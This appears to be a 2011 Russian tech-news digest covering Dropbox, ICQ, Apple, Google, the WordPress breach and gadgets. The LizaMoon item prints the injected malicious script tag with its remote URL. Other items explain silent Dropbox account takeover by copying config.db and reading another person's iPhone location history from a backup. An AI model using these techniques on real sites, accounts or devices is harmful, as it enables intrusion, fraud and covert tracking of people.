Найдена дырка в Dropbox
Неприятная новость распространилась по интернету со скоростью лесного пожара: в Dropbox, популярнейшем решении для синхронизации файлов между разными компьютерами и мобильными устройствами, обнаружили уязвимость. Найденная дыра, увы, не пустяшная: все дело в файле config.db, хранящемся по адресу %APPDATA%Dropbox и являющему собой таблицу базы данных.
В таблице всего лишь три поля — email, dropbox_path и host_id. Последнее поле не относится к определенному хосту, назначается системе после первой авторизации и не меняется со временем. И вот в чем прикол. Для авторизации Dropbox использует именно это самое значение host_id, а файл config.db портативен и не связан с системой.
Получается, что копирование config.db на другую машину и запуск Dropbox немедленно синхронизирует эту систему с аккаунтом, без уведомления пользователя и без внесения новой системы в список доверенных! Хуже того, пользователь даже ничего не заметит, а если он сменит логин и пароль, тоже ничего не изменится, — host_id все равно останется валидным. Ждем малварь, нацеленный на config.db и host_id?
Кстати, никаких методов защиты кроме зубодробительного шифрования данных или отказа от использования Dropbox’а пока нет. Все подробности в блоге у хакера Дерека Ньютона, который и нашел уязвимость: bit.ly/dropbox_fail.
Массовый переход на Jabber отменяется
Как ты знаешь из наших предыдущих публикаций, популярный на просторах нашей родины мессенджер ICQ, а также протокол icq с недавних пор являются собственностью инвестиционного фонда Mail.ru Group.
Признаться, мы не ждали от продажи аськи ничего хорошего, и понимали, что существует реальная опасность объявления войны альтернативным клиентам. И войны куда более серьезной, чем в свое время вел AOL. Иногда ошибаться приятно :). Стало известно, что теперь протокол icq может спокойно использоваться в некоммерческих альтернативных клиентах, ограничения сняты, а альтернативы — полностью легализованы.
Новую, более мягкую версию лицензионного соглашения уже опубликовали официально, найти ее можно на icq.com. Из старых ограничений для разработчиков некоммерческих приложений сохранились разве что пункты, связанные с недопустимостью таких злоупотреблений как извлечение информации из каталогов и баз данных ICQ, массовая рассылка нежелательных сообщений и введение пользователей в заблуждение.
Глава ICQ в России, Александр Горный, особенно подчеркивает: «Легализация всех существующих на сегодняшний день неофициальных ICQ-клиентов — одна из важнейших задач для Mail.Ru Group на текущем этапе развития продукта. Анонсируя новое лицензионное соглашение, мы хотим еще раз официально подтвердить готовность к переговорам и поиску приемлемых вариантов сотрудничества с другими игроками рынка. Ведь наша общая цель — создание безопасных и удобных условий общения для пользователей». Кстати, монетизируемые клиенты тоже не были забыты или запрещены, с их разработчиками в Mail.ru готовы обсудить условия партнерства и договориться.
«Яблочные» дисплеи с обратной связью
Еще одним патентом пополнились и без того почти бездонные закрома компании Apple. Стало известно, что яблочный гигант запатентовал сенсорные дисплеи с обратной связью. Разумеется, никаких гарантий, что уже в скором будущем мы увидим реализацию этих идей в готовых продуктах, нет. Но согласись, если отбросить визуальную сторону дела, при работе с тачскрином (при всем его удобстве) действительно не хватает физического отклика от устройства.
Банальный набор даже небольшого текста крайне утомителен. Apple подали патент на механизм тактильной обратной связи еще в 2009 году, и теперь наконец-то завершили все процедуры регистрации. Изюминка технологии заключается в использовании массива стержней, которые поднимаются над поверхностью сенсорного экрана.
Эти стержни создают иллюзию рельефной картинки под пальцами, и складывается впечатление, что ты нажимаешь на настоящие кнопки. Что-то вроде дисплея Брайля для неслепых. Другая технология, которая также описана в патенте, не менее интересна: под экраном располагается структура, создающая впадины. При нажатии в центр такой впадины, она легко поддается, но при нажатии на периферийную часть — ощутимо сопротивляется.
Скрипт Lizamoon повсюду
Ты уже наверняка слышал отголоски шумихи, которая совсем недавно поднялась по всему инету из-за скрипта LizaMoon. Масштабы поражения действительно впечатляют. Массовая SQL-инъекция на веб-приложения, которые работают на платформе IIS + MS SQL Server, привела к заражению сотни тысяч сайтов по всему миру. Такие крупные прецеденты случаются, прямо скажем, не часто. Инфекция затронула в основном США, Канаду, Италию, Бразилию и Великобританию. Казалось бы, информация о LizaMoon широко распространилась в Сети и прессе, а значит, эпидемия должна пойти на спад. Но ничего подобного. На данный момент поиск в Google выдает более чем 1 500 000 результатов, связанных с URL, с которого началась атака!
Впрочем, эксперты уверяют, что данные поисковой выдачи — не самый надежный метод сбора статистики, и возможно, масштабы эпидемии не до такой степени велики. Механизм работы малваря довольно прост: внедряемый файл меняет текстовые поля в базе данных, добавляя в них дополнительный фрагмент <script src=hxxp://lizamoon.com/ur.php></script>, который загружает вредоносную программу с удаленного сервера. Затем пользователя перенаправляют на сайт, откуда ему загружается фальшивый авер Windows Stability Center. На машине юзера, как по мановению волшебной палочки оказывается целый букет вирусов, и тут же предлагается «спасение» — загрузка антивирусного ПО.
Разумеется, Microsoft никакого отношения к этому сайту не имеет, антивирь поддельный, и, в качестве «вишенки на торте», за полную версию этого фейка пользователю предлагается заплатить.
Поиск по фотографии. Быстро. Недорого.
Еще совсем недавно это было шуткой и темой для забавных комиксов. Параноики мрачно юморили, что скоро-скоро поисковики научатся искать людей в Сети по фотографиям, и вот тогда-то, наконец, и наступит полный абзац. Кажется, дошутились. По Сети гуляет слух, что в Google вовсю кипит работа над приложением, которое будет искать в интернете личные данные людей, отталкиваясь от обычных фотоснимков. Пока, судя по всему, предполагается поиск по Google’s Profiles и социальным сетям, и только с предварительного согласия владельцев аккаунтов.
Шпионское приложение будет искать имя, телефонный номер и адрес электронной почты. О поиске какой-либо другой информации пока ничего не сообщается. Самое жуткое заключается в том, что у Google есть все необходимое для реализации этой идеи — и технические возможности, и софтверные. Этому нетрудно поверить, если вспомнить, что поисковый гигант проводит эксперименты в области распознавания изображений с 2009 года, имеет немало тематических патентов и уже даже приобрел компанию Like.com, занимавшуюся исследованиями в этой области. Даже если данный слух окажется выдумкой, и Google не вынашивает подобных планов, где гарантия, что нечто подобное не реализует кто-нибудь другой?
Какое же чудное и веселое будущее нас ожидает, дорогой читатель.
Плюс один
Социальные закладки уже стали неотъемлемой частью Сети. Кнопки «поделиться» есть почти на каждом уважающем себя сайте, так что переправить информацию в Twitter, Facebook, блог и так далее — проще простого. Похоже, у столь популярной кнопки «Like it» появился тяжеловесный конкурент: компания Google запустила в тестовом режиме кнопку +1. Новый элемент UI будет наличествовать рядом с каждым результатом поиска, и ее можно будет нажать, если сайт тебе понравился. Эти действия, вполне предсказуемо, будут влиять на релевантность информации для тебя и твоих контактов.
То есть, если человек из твоего списка Google Contacts или Gmail нажал +1 на какойто странице, то данный сайт для тебя будет выше других в результатах поиска (при прочих равных условиях). Кстати, кнопки +1 не только будут отображаться рядом с результатами поиска, но также появятся и просто на страницах сайтов.
Старый добрый компьютер в клавиатуре
Думаю, многие наши читатели застали и хорошо помнят компанию Commodore, выпускавшую в 80-е годы культовые компьютеры Commodore и Amiga. Однако немногие знают, что Commodore USA сейчас пытается вернуть те славные дни и создать современный компьютер в клавиатуре. Недавно Commodore представила уже законченную и готовую к продаже модель Commodore VIC-Slim, которая разве что немного толще и тяжелее обыкновенной «клавы». Глядя на девайс с габаритами 460 x 168 x 16, 1-30.1 мм, сложно заподозрить, что внутри скрывается двухъядерный процессор Intel Atom D525 (1,8 ГГц) и набор системной логики Intel NM10. «Клавиатура» также оснащена 1 или 2 Гб памяти DDR3-1066, жестким диском на 250 или 500 Гб, адаптерами Ethernet 100 Мбит/с, 802.11b/g/n Wi-Fi и Bluetooth, а также звуковым кодеком Realtek HD Audio. Имеются у Commodore VIC-Slim и пять портов USB 2.0, один порт COM, выход VGA, вход и выход звуковой подсистемы.
С ценами на данный девайс все непросто. За $295 ты можешь приобрести систему без памяти, дискового накопителя и средств беспроводного подключения. Эдакий набор «сделай сам». Добавление 1 Гб памяти, винчестера объемом 250 Гб, Wi-Fi и Bluetooth увеличит цену до $395.
Максимальная же конфигурация с Wi-Fi и Bluetooth, 2 Гб памяти и винчестером объемом 500 Гб обойдется тебе в $495. Практически идеальный подарок любителю олдскула :).
Nintendo не сдается
С выходом Move для Play Station и Kinect для Xbox 360 остальные производители консолей ощутили, что безоблачные деньки прошли.
Особенно сильно это, конечно, ударило по Nintendo Wii. Если раньше манипуляторы Wii были уникальны, и Nintendo, без преувеличения, совершила революцию, то с появлением подобных девайсов у соперников золотая пора для Wii явно осталась позади. Хорошо иллюстрируют ситуацию цифры: по сравнению с 2009 годом прибыль компании в 2010-2011 году упала на 66%! Руководство Nintendo, однако, предвидело такое развитие событий, и довольно скоро (вероятнее всего, в 2012 году) мы наконец увидим новую версию консоли Wii.
Слухи о появлении Wii 2 ходят уже более 2-х лет и, судя по всему, они были правдивы. Ожидается, что официально приставку продемонстрируют миру на конференции E3, которая состоится в июне. Но уже сейчас в Интернете появилась информация, что новая консоль получит возможность воспроизводить FullHD (1080p, в то время как у конкурентов в играх 720p); вероятно, обзаведется приводом Blu-Ray; и поговаривают даже о появлении 3D. В довесок по Сети курсирует упорный слух, что Wii 2 якобы получит имя Stream, что может указывать на возможность потоковой передачи игрового контента на встроенный дисплей, который будет частью контроллеров новой приставки. Да-да, нам обещают полностью новый контроллер и встроенный сенсорный дисплей. Осталось дождаться E3 и узнать подробности.
Двухъядерная «Сенсация» от HTC
Смартфоны тайваньской компании HTC заслуженно пользуются большой популярностью во всем мире, и наша страна не является исключением. Очередная новинка от HTC, представленная в Лондоне 12 апреля, уже стала объектом вожделения многих поклонников бренда :). Двухъядерный смартфон, работающий под управлением Android 2.3 Gingerbread и HTC Sense 3.0, проектировался как настоящий флагман и получил имя Sensation («сенсация» — англ.). Производитель нескромно называет новинку мультимедийным суперфоном.
В списках компонентов Sensation действительно впечатляющие позиции: двухядерный процессор Qualcomm Scorpion частотой 1.2 ГГц + GPU Adreno 220 и оперативная память 768 Мб. SLCD-дисплей диагональю 4.3" обладает разрешением 960х540 пикселей и надежно защищен закаленным стеклом Gorilla Glass.
Кстати, прочен не только дисплей: весь корпус аппарата выполнен из единого куска алюминия, как было в HTC Mozart и HTC Desire S. Гармонично дополняют картину две камеры: фронтальная VGA и 8-мегапиксельная с LEDвспышкой, способная снимать видео в разрешении 1080p. Емкость батареи смартфона — 1520 мАч. MicroUSB-порт Sensation совмещен с разъемом MHL. Разработчики также отмечают, что ощутимо ускорен запуск приложений и значительно доработан интерфейс HTC Sense 3.0, достойный отдельной небольшой статьи.
В России смартфон поступит в продажу где-то в июне. О цене новинки пока ничего не сообщается, но мы полагаем, что она составит примерно 25-28 000 рублей.
Михалков отстоял свое право на «оброк» с болванок
Мы уже неоднократно писали о так называемом «налоге на болванки», который в России ввели относительно недавно. Напомним, что Российскому Союзу Правообладателей, который возглавляет Никита Михалков, являющийся главным лоббистом данного налога, разрешили собирать отчисления в размере 1% со всех носителей аудиовизуальной информации. Казалось бы, 1%, чего здесь страшного? Однако посмотри на список девайсов, которые обложили налогом: ЭВМ общего назначения, ЭВМ клавишные, ЭВМ прочие, устройства запоминающие внутренние, устройства запоминающие внешние, аппаратура звукозаписывающая, аппаратура телевизионная, аппаратура видеозаписи и воспроизведения бытовая, телефоны, широковещательные радиоприемники.
Под эти определения, как ты понимаешь, попадают и DVD, и флешки, и жесткие диски, и мобильные телефоны (кстати, какие именно «телефоны», там не сказано — может, и дисковые тоже?), и компьютеры всех мастей. В общем, масштаб уже ощущается, не так ли? Общая сумма сбора по некоторым прогнозам может превысить 100-150 миллионов долларов в год. Однако в январе текущего года у РСП попытались в судебном порядке отобрать аккредитацию на сбор «налога на болванки»: протест выдвинул единственный конкурент Михалкова — Российское общество по смежным правам, утверждавшее, что конкурс по выбору сборщика пошлин был проведен незаконно.
Зимой Арбитражный суд Москвы принял решение, гласившее, что претензии РСП на сбор 1% со стоимости звукозаписывающей техники и чистых носителей являются неправомерными. Рунет (где, как известно, Никиту Сергеевича не особенно любят) вздохнул с облегчением, но, как оказалось, рано. В середине апреля по просьбе Росохранкультуры и самого РСП решение Арбитражного суда было отменено, а аккредитация Российского Союза Правообладателей на сбор «оброка с болванок» подтверждена. Осталось еще обложить налогом интернет, и, чего мелочиться, воздух.
Sony и Хотц помирились
Парадоксально, но факт — компания Sony и Джордж «GeoHot» Хотц, сумели урегулировать свои разногласия мирным путем. Напомним, что компания подала на GeoHot’а в суд из-за джейлбрейка консоли PS3 и обнародования сопутствующих материалов в Сети. Хотц, в свою очередь, объявил Sony настоящую войну, призывая бойкотировать продукцию компании, выступая на ТВ и широко освещая конфликт в своем блоге: geohotgotsued.blogspot.com. Теперь же выясняется, что мирное соглашение между корпорацией и GeoHot’ом было подписано еще 31 марта.
Хотц согласился больше не ломать устройства Sony, не помогать в этой области другим хакерам, а также не распространять конфиденциальную информацию о компании. Если он нарушит условия соглашения, его ждет штраф в размере от $10 000 до $250 000. Тем не менее, со страниц своего сайта Хотц попрежнему призывает общественность бойкотировать Sony и не покупать их продукцию, а также обещает, что это еще не конец. Хакер пожертвовал $10 000, оставшиеся от сбора средств на суд с Sony, в пользу Electronic Frontier Foundation. Он пишет, что делает это «в надежде на то, что Америка сможет в один прекрасный день снова стать ярким образцом свободы без DMCA и ACTA, что частный интерес никогда не превзойдет идеи неприкосновенности частной жизни, собственности и свободы слова, изложенные в Конституции».
Одним словом, умения эпатировать публику Джорджу не занимать :).
Закон об электронной подписи
Свершилось! 8 апреля 2011 года вступил в силу новый Федеральный закон N63-ФЗ «Об электронной подписи». Цифровая подпись предназначается для использования в электронных документах, в частности, при обращении в государственные службы и ведомства. Старая версия закона (1-ФЗ) имела много недочетов, к примеру, она фактически не допускала использования ЭЦП для юридических лиц — подпись всегда была только для лиц физических. Новый закон учел этот нюанс, а также множество других.
Отныне законодательство допускает использование одной только технологии электронной подписи (основанной на технологии асимметричных ключей) и делает необходимой иерархическую систему удостоверяющих центров. Изменили также и само определение электронной подписи, теперь в нем закреплен основной признак, присущий всем видам таких подписей, — возможность ее использования для идентификации физлица или юрлица, подписавшего информацию в электронно-цифровой форме.
Предусмотрены механизмы признания иностранных электронных подписей. Подписи теперь могут быть трех видов: простая электронная подпись, усиленная неквалифицированная и усиленная квалифицированная. Предусмотрена также и ответственность для удостоверяющих центров и тех, кто использует усиленную или квалифицированную электронную подпись, а также за причиненный вред в результате нарушения правил их использования. Скорее всего, электронная подпись будет платной, причем ее стоимость будет зависеть от цены цифрового носителя. С полным текстом закона ты можешь ознакомиться на сайте «Российской газеты»: rg.ru/2011/04/08/podpisdok.html.
Apple Store идет в Россию
Когда поклонники яблочной компании уже почти отчаялись, чудо, похоже, все же решило произойти. ifoAppleStore.com сообщает, что в марте столицу России посетили топ-менеджеры Apple Рон Джонсон и Боб Бриджер. Эти двое приехали вовсе не для того, чтобы поглазеть на Красную площадь: они выбирали место для первого Apple Store на постсоветском пространстве.
Судя по всему, первый яблочный магазин откроет свои двери в здании гостиницы «Москва» — той самой, что рядом с Кремлем и Манежной площадью. Для тех, кто не знает: гостиница с 2002 года закрыта на реконструкцию, завершение работ запланировано на конец 2011 — начало 2012 года. Менеджеры Apple, похоже, присмотрели там двухэтажное помещение площадью около 1500 м2. По информации все того же ifoAppleStore.com, договор аренды пока не подписан, но решение будет принято в ближайшее время. Неужели не будет больше перекупщиков и новинок от Apple по цене в пять раз превышающей реальную (в первые дни продаж iPad 2 в Москве он стоил около 120 000 рублей)? Фантастика.
Российский финал Imagine Cup
16 апреля в Культурном центре Государственного университета Высшая школа экономики (НИУ ВШЭ) состоялся российский финал ежегодного кубка технологий Microsoft Imagine Cup 2011. В этом году в Imagine Cup зарегистрировались и приняли участие более 8 000 человек, но до финала добрались лишь двенадцать команд. Восемь команд в категории «программные проекты» и четыре команды в категории «встраиваемые системы». Помимо выступлений команд, на мероприятии проходили различные конкурсы, работали демонстрационный стенд Windows Phone 7 и уникальный передвижной планетарий Worldwide Telescope из МГУ. Чтобы посмотреть на финал, послушать именитых гостей и просто пообщаться с такими же увлеченными людьми, собралось более трехсот зрителей из различных вузов. Еще несколько сот человек смотрели прямую трансляцию в Сети.
В этом году российский финал судило жюри, состоявшее из представителей организаторов конкурса, университетов, спонсоров мероприятия и журналистов (в «судейский корпус» входил и главный редактор Хакера). Жюри выбрало две команды, которые представят Россию в финале соревнований, который состоится в июле этого года в Нью-Йорке. Первое место в категории программных проектов заняла команда Oriteam из Московского авиационного института с проектом Oricrafter. Эта система направлена на преодоление пристрастия детей к компьютерным играм и приобщения их к реальному творчеству с помощью искусства оригами.
Первое место в категории встраиваемых систем отошло команде Calvus из Саратовского государственного технического университета с проектом автоматизированного комплекса по выращиванию и разведению личиночной формы аксолотля — особи, используемой при исследовании стволовых клеток. От всей души поздравляем ребят с победой и желаем им удачи в Нью-Йорке!
Твой Iphone следит за тобой. И Android тоже.
Все чаще и чаще в современной жизни можно найти повод для приведения цитаты из Оруелла: «Большой брат следит за тобой». На этот раз группа независимых энтузиастов выяснила, что устройства компании Apple (iPhone и iPad) фиксируют и бережно хранят координаты местоположения себя любимых. Месторасположение, судя по всему, определяется методом триангуляции по сигналу от сотовых вышек и точкам Wi-Fi. Началось это, по мнению упомянутых энтузиастов, с выходом iOS 4. Собранные устройством данные записываются в скрытый файл consolidated.db, который сохраняется на компьютер владельца при каждой синхронизации телефона или планшета с iTunes. Уже подтверждено, что собранная инфа (координаты устройства и дата-время) не передается на удаленные сервера Apple или каких-либо других компаний, так что Стив Джобс, дорогой читатель, за тобой не шпионит. Однако приятного в этой слежке все равно мало. Почему?
Да потому что с помощью простенькой программы iPhone Tracker (petewarden.github.com) можно просмотреть данные о передвижении яблочного гаджета, вытащив их из бэкапа, который создается при каждой синхронизации девайса с iTunes. А ведь можно выудить эту информацию не только из своего аппарата, но и из чужого... Представляешь, к примеру, муж может взять и посмотреть все перемещения своей половинки за последний год.
А если наоборот? В качестве «лекарства» парни, обнаружившие брешь, предлагают разве что зайти через iTunes в настройки аппарата и поставить галочку напротив «Encrypt iPhone Backup». Кстати, после распространения этой новости по Сети разработчик Магнус Эрикксон поковырялся в Android-устройствах и обнаружил почти то же самое. Файлы cache.cell и cache.wifi, хранящиеся по адресу /data/data/com.google.android.location/files, ну очень похожи на вышеупомянутый consolidated.db. Но у Android максимальное количество хранимых данных хотя бы ограничено 50 записями для сот и 200 записями для WiFi-точек. Есть также ограничение по времени: 12 часов для сот и 48 часов для WiFi.
Черная полоса WordPress
Одна из наиболее популярных в мире площадок для блогов — WordPress — в последнее время переживает не лучшие времена. Нет, количество пользователей WordPress попрежнему огромно и популярность велика, но в прошлом месяце WordPress.com пережил мощнейшую в своей истории DDoS-атаку, от которой пострадало почти 18 000 000 блогов, в том числе и со статусом VIP.
Представители компании тогда заявляли, что мощность атаки составила «несколько гигабит или десятки миллионов пакетов в секунду», причем атака затронула серверы проекта, расположенные в трех различных датацентрах. А в этом месяце WordPress вообще взломали. Хак вышел просто отличный: неизвестные взломщики получили root-доступ к ряду серверов компании Automattic, владеющей блог-хостингом WordPress.com.
В руки киберпреступников попала прорва данных, включая исходники VIPсайтов, внутренние документы и публикации, пароли и авторизационные ключи от различных служб и аккаунтов, которые используются для интеграции сайтов с социальными сетями (такими как Facebook или Twitter), облачными сервисами хранения и обработки данных (например, Amazon S3). Не исключено, что «уплыли» и приватные ключи SSL-сертификатов.
Каким образом злоумышленники сумели проникнуть на сервера компании Automattic, да еще и получить там root-привилегии, компания не сообщает, прикрываясь тем, что сейчас ведется расследование.
Цветная «книжка» от Wexler
Компания WEXLER, чьи устройства для чтения весьма популярны на российском рынке, не забывает и о тех, кого не привлекают плюсы технологии «электронных чернил». Компактный девайс, получивший название WEXLER.BOOK T5002, разработан на базе 5-дюймовой сенсорной TFT-матрицы с LED-подсветкой. Как ты понимаешь, дисплей данного ридера – цветной, и с него с легкостью можно читать в темноте или при плохом освещении. И, кстати, с WEXLER.BOOK T5002 можно не только читать (поддерживаются форматы ASCII, TXT, DOC,PDB,HTML,PDF, FB2), но и смотреть видео (WMV, RM, AVI, RMVB, 3GP, FLV, MP4, DAT, VOB, MPG, MPEG, MKV, MOV), изображения (JPEG, BMP, GIF), слушать музыку (MP3, WMA, APE, FLAC, AAC), радио или аудиокниги через встроенный динамик или через наушники.
Однако, как известно, за подсветку и цвет обычно приходится расплачиваться непродолжительным временем работы устройства… В этом смысле у WEXLER все в полном порядке: TFT-матрица WEXLER.BOOK T5002 имеет очень низкое энергопотребление. При чтении полного заряда аккумулятора хватает более чем на 7 часов, при просмотре видео – более чем на 4 часа, при прослушивании аудио-файлов (при выключенном экране) – более чем на 25 часов. Управляется устройство при помощи сенсорного экрана – легким прикосновением руки или стилуса, который идет в комплекте. Для быстрого перехода между страницами на передней панели «книжки» размещены специально вынесенные кнопки.
WEXLER.BOOK T5002 также оснащается датчиком пространственного положения G-сенсор, который позволяет одним движением руки менять положение станицы на экране от вертикального к горизонтальному и обратно. Одной из наиболее интересных характеристик новинки является также и ее цена – она составит всего 3499 руб. WEXLER.BOOK T5002 уже поступил в продажу, так что можешь начинать искать его на прилавках магазинов своего города.
Школа авторских прав от Youtube
YouTube уже давно известен как рассадник повальной копирастии, где малейшее нарушение правил чаще всего приводит к бану аккаунта. Точнее — приводило. YouTube решил пересмотреть свою политику и донести до юзеров, что же именно они делают не так.
Отныне, если какой-то твой ролик уличат в нарушении чьих-либо авторских прав, тебя не забанят, а отправят... смотреть мультики. Это не шутка, проштрафившиеся юзеры отправляются в «Школу авторских прав YouTube» (Copyright shcool), где им будет предложено посмотреть обучающий мульт из серии Happy tree friends (!), а затем пройти простенькое тестирование, доказывая, что содержание ролика не прошло мимо мозга. После этого аккаунт будет разблокирован. Поржать и насладиться этим торжеством маразма можно прямо вот здесь: youtube.com/copyright_school. Субтитры на всех языках мира в комплекте.
Акустика DA 5000 PRO в России
Долго, очень долго добиралась в «наши палестины» акустическая 5.1 система DA 5000 Pro от известной компании Edifier. На рынки Украины, Греции, Дании и других стран DA5000 Pro поступила еще пару лет тому назад и завоевала там огромную популярность. Секрет успеха данной модели заключается в следующем: во-первых, это более продвинутая версия базовой DA5000 (теперь сателлиты сделали деревянными и двухполосными), тоже имевшей большой успех, во-вторых, в новых сателлитах DA 5000 Pro легко опознать почти полную копию сателлитов другой популярной модели - C3. Их корпуса по-прежнему выполнены из листов MDF толщиной 9 мм, но если в случае С3 использовалась отделка под натуральное дерево, то в комплекте DA 5000 Pro она заменена обычной черной пленкой ПВХ.
Благодаря этому система выглядит более благородно и уверенно. Добавим к перечисленному массивный деревянный сабвуфер, LED-дисплей с индикацией состояния регулировок, полноценный ДУ нового образца с большим набором настроек и предустановок, и FLASH-память для сохранения/запоминания настроек управления. Технические характеристики новинки таковы: выходная мощность фронтальных сателлитов — Вт (RMS) 2х12, выходная мощность тыловых сателлитов — Вт (RMS) 2х12, выходная мощность центрального канала — Вт (RMS) 12, выходная мощность сабвуфера — Вт (RMS) 60. Частотный диапазон сателлитов составляет 160-20000 Гц, частотный диапазон сабвуфера — 20-160 Гц. Входное сопротивление — 20 кОм . Уровень входного сигнала: 450 мВ. Рекомендованная цена DA 5000 Pro составляет $235.
Массированный удар по покеру
Для любителей азартных игр, похоже, наступила черная полоса. Мало того, что не дают поиграть в реале, так теперь добрались и до сетевых казино. Крупнейшие залы онлайн-покера (Pokerstars, Full Tilt Poker и Absolute Poker) внезапно прикрыли. Как оказалось, на Западе было начато уголовное расследование против руководства этих компаний. Выдвинутые обвинения впечатляют: тут и банковское мошенничество, и отмывание денег, и организация незаконных азартных игр, и многое другое. Всего по делу проходят одиннадцать человек, трое из которых уже были арестованы, а затем отпущены под залог (остальные находятся вне территории США).
Сайты PokerStars и Full Tilt Poker обещают в скором времени разблокировать, но лишь для того, чтобы игроки смогли вернуть свои деньги, замороженные одновременно со счетами подследственных компаний. Контролировать процесс возврата средств будет независимый наблюдатель, которого выберут позднее.
Третьему сайту — Absolute Poker — также была предложена возможность временной разблокировки домена, но руководство этого покер-рума пока не выразило особенного восторга по этому поводу.